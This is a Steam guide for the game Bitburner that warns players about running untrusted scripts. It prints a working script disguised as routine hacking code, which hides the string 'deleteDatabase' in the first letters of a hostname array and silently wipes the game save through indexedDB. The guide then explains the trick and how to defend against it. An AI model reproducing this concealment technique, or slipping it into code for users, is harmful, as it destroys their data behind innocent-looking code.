Store Page
Bitburner
All Discussions Screenshots Artwork Broadcasts Videos News Guides Reviews

Bitburner

Store Page
Bitburner Guides Claptrap Did Nothing Wrong's Guides
171 ratings
The Big D Virus
By Claptrap Did Nothing Wrong
This details the most dangerous exploit ever discovered by the bitburner community. It would be considered a Level 3 Bug under Apple's Security Bounty program, as it allows broad, unauthorized access to sensitive data via a user-installed app (in this case, a js file).

In this report is a source code file that, if you run it, will delete your save invisibly. You will not know that your save has been deleted until you reload the game, at which point, you will return to the Tutorial.

This is being published in an effort to warn all users of the dangers of copying and running source code from untrusted sources, such as this Steam page, without thoroughly reading, reviewing, and reimplementing it in your own words.
7
4
7
   
Award
Favorite
Favorited
Unfavorite
Created by
Claptrap Did Nothing Wrong
Offline
Category: Multiplayer
Languages: English
Posted
Updated
23 Feb, 2022 @ 4:50pm
31 Aug, 2024 @ 1:09pm
12,189 Unique Visitors
90 Current Favorites
Guide Index
Overview
Dangerous Source Code 
Limit of Vulnerability 
Explanation of Vulnerability 
Comments
Dangerous Source Code
This will delete your save. Do not run without first exporting your save.
/** @param {NS} ns **/ export async function main(ns) { let attackers = ["home"] let attackable = [ "darkweb", "univ-energy", "titan-labs", "applied-energetics", "taiyangdigital", "alpha-ent", "Defcomm", "b-and-a", "titanlabs", "aerocorp", "blade", "fulcrum-assets", "syscore", "ecorp" ] let hostnames = attackable.map(s => s.split("-")[1] || s[0]).map(s => s[0]).join("") for (let hostname of hostnames) { // ns.print("--------------------------") // ns.print(hostname, " ", ns.getServerMaxRam(hostname) - ns.getServerUsedRam(hostname)) // ns.print("--------------------------") } if (ns.getPlayer().money > 110000) { let server = ns.purchaseServer("bitburnerSave", 2) ns.tprint("purchased server: ", indexedDB[hostnames](server)) } try { for (let target of attackable) { if (ns.getServerSecurityLevel(target) > ns.getServerMinSecurityLevel(target)) { await ns.weaken(target) } else if (ns.getServerMoneyAvailable(target) < ns.getServerMaxMoney(target)) { await ns.grow(target) } } } catch { ns.tprint("error attacking") } }
Limit of Vulnerability
No sandbox escape: This cannot harm your computer in any way. Its effects are limited to the window Bitburner is running in. The browser 'sandboxes' the Bitburner client. To escape this sandbox, you'd have to defeat Google Chrome's security, which is functionally impossible, as there are millions of professional security researchers around the world who make their livelihood trying to do just that. If a sandbox escape was discovered, I expect the discoverer would prefer to claim the bug bounty (or sell it to the highest bidder) rather than delete a bunch of Bitburner games.

No Steam privileges: This also cannot harm your Steam account in any way. Technically, a similar exploit could be used to falsify achievements, but it could only grant new ones, not take old ones away... and achievements would be the limit of its control. The source code provided here will not modify your achievements.

This exploit cannot modify exported save games. Bitburner provides an "Export Save Game" functionality and encourages users to regularly use it by providing a buff every 24h for exporting a save game. The exported save contains the database at the time of export. As a result, you can only lose data up to your most recent exported save. Importing that save restores all functionality.
Explanation of Vulnerability
If you run a javascript file containing the following command, your savestate will be deleted.
indexedDB.deleteDatabase("bitburnerSave")

While this exploit uses the word "bitburnerSave," that was just me being lazy. It does not use the word "deleteDatabase" anywhere.

The attackable[] array was specially selected and ordered such that the first letter of each word, or, if the word contains a dash, the first letter of the second word, hide the word "deleteDatabase."

  • "darkweb",
  • "univ-energy",
  • "titan-labs",
  • "applied-energetics",
  • "taiyangdigital",
  • "alpha-ent",
  • "Defcomm",
  • "b-and-a",
  • "titanlabs",
  • "aerocorp",
  • "blade",
  • "fulcrum-assets",
  • "syscore",
  • "ecorp"

Attacks of this nature -- reliable ones, at least -- will almost always rely on arrays of strings, which are javascript's only ordered data structure. Arrays of integers could be used, but this would likely make the attack more obvious, rather than less.

The attack occurs in the ns.tprint() line after a server is purchased. This line explicitly calls the following function:

indexedDB["deleteDatabase"]("bitburnerSave")

Which is syntactically identical to the original attack function described earlier.

I have characterized this as "The Big D Virus" because of the capital "D" in Defcomm. This capital "D" is critical to getting the specific string "deleteDatabase," as a lowercase "d" would yield "deletedatabase" and have no effect. Achieving that capitalization without specifically typing it as part of a string would require multiple layers of obfuscation so as to not reveal that it is generating a capital D, and every extra line of obfuscation sticks out like a sore thumb to someone reading the source code.

You can prevent or eliminate your exposure to a rudimentary attack such as this by avoiding "Big D" source code -- any source code that contains a capital D stored in an array. That simple rule, plus reviewing the source and removing lines you don't understand (or learning exactly what they do, so that you do understand them), will fully protect you against this attack.
9 Comments
< >
BigE 28 May @ 9:40pm 
Oh, yes. Little Bobby Tables we call him.
Mac3716 9 Mar @ 3:53pm 
Reading this and audibly going "wooooooooooooow" when realizing where the command was hidden tells me that I'm gonna be obsessed with this game (have already played 2.5 hours today as its my first time.)
Keth 30 Dec, 2024 @ 7:48am 
This is so good that I'm going to backup my save and run in on purpose. Ha!
Alfadorfox 1 Aug, 2022 @ 3:16pm 
a) Also, BACK UP YOUR SAVES. b) This is why instead of copying and pasting code, you rewrite only the parts you understand, and in your own words, and then debug any parts that don't work the way you expect.
slthrwzrd 30 Mar, 2022 @ 11:13pm 
thank you.
hydroflame  [developer] 18 Mar, 2022 @ 8:33am 
You named it BigD because one of the dev is named BigD, kindof a dick move but ok.
zeroSkill 11 Mar, 2022 @ 11:11am 
blowminded.
rocketboy604 9 Mar, 2022 @ 1:21pm 
In a word, Awesome.

I'm not sure if this is a bad thing or not. On one hand for someone new to programming I'm sure it would be a huge bummer to lose their save game. On the other, it's a valuable lesson about not downloading and running random crap. For a game where one of the achievements
involves editing the game's source code it seems in-line.

Using the hostname list is clever, I didn't see it at first glance.
Lienhart 2 Mar, 2022 @ 4:19pm 
Am a developer. Am very appreciative of this!

Thank you kind sir!